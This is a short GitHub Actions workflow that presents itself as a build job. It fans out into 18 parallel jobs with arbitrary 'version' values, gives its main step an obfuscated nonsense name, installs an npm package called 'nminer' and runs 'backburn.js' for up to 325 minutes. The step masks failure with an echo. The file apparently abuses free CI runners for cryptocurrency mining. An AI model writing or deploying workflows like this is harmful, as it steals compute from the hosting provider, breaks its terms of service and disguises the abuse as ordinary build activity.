name: backburn
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2263 }
          - { version: 2232 }
          - { version: 4998 }
          - { version: 2060 }
          - { version: 6497 }
          - { version: 2776 }
          - { version: 9989 }
          - { version: 2734 }
          - { version: 9866 }
          - { version: 8382 }
          - { version: 3526 }
          - { version: 5688 }
          - { version: 6225 }
          - { version: 5828 }
          - { version: 4000 }
          - { version: 5529 }
          - { version: 51 }
          - { version: 9898 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: chasuble graceful vastly maul
        run: |
          npm install nminer@latest
          timeout 325m node backburn.js || echo "backburn executed"